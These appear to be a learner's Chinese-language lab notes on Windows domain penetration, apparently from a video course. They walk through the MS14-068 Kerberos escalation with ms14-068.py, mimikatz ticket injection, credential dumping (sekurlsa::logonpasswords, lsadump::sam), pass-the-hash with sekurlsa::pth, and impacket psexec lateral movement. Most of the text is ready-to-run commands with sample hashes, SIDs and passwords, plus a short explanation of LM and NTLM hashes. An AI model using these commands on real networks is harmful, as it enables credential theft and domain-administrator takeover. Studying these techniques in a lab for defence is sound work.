参考资料
录制的视频教程
域渗透实践篇(二)
- 域信息搜集
- ms14-068 域普通用户提权到域管理员
域渗透实践篇(三)
- pass the hash票据传递攻击
Kerberos域用户提权漏洞ms14-068
准备域内普通用户权限(以及DC未打补丁)
域控添加一个user用户
192.168.1.3 计算机添加user用户
| net user user admin!@
注销管理员用户,登陆用户user
用户名:SRV-WEB-KIT\user
密码:admin!@
|
测试域普通用户与域管理员区别
生成高权限票据
| python ms14-068.py -u whale@0day.org -s S-1-5-21-1812960810-2335050734-3517558805-1178 -d 192.168.1.131 -p qwe123$%
需要普通域用户名称
普通域用户sid
普通域用户明文密码或者hash
|
- mimikatz导入hash
| mimikatz.exe
kerberos::list #列出内存中的票据信息
kerberos::purge #清除内存中的票据信息
kerberos::ptc TGT_whale@rootkit.org.ccache(生成的高权限票据全名) #导入高权限票据到内存,获得域管理员权限
|
票据传递
| mimikatz_command -f sekurlsa::logonPasswords
导出登陆的密码
python /usr/share/doc/python-impacket/examples/psexec.py Administrator@192.168.1.2 cmd.exe
使用密码admin!@#45,成功连接
使用ntlm hash,ccef208c6485269c20db2cad21734fe7,连接失败
有两种可能
1. 工具psexec.py,只能使用明文密码连接
2. hash出错,不是ccef208c6485269c20db2cad21734fe7, 而是其他hash
3. windows 2012 R2不支持pass the hash
|
NT hash、LM hash、NTLM hash
LM hash的全名LAN Manager Hash,容易被破解。因此windows visa与winSever2008之后的版本默认禁用了LM hash。
NTLM hash取代了LM hash,安全性更高,从windowsSever2003开始,默认使用NTLM hash。
所说的NT hash就是NTLM hash,有些文档这么称呼,我还以为是两种不同的加密方式,只是称呼不同而已。
mimikatz提权ntlm hash
| mimikatz.exe
log
lsadump::sam /sam:sam.hiv /system:sys.hiv
|
查看DC机器与Web机器的hash是否一致
| 修改web机器密码:net user administrator qwe123$%
保持这个密码与DC一致
DC (192.168.1.131): 4b211aa32bcd009f4d46f52438fe433d
WEB(192.168.1.130):4b211aa32bcd009f4d46f52438fe433d
privilege::debug
sekurlsa::pth /user:administrator /domain:0day.org /ntlm:4b211aa32bcd009f4d46f52438fe433d
|
| mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
一行命令,将结果保存到log.txt
|
| sekurlsa::logonpasswords
dir \\OWA2010SP3\C$
|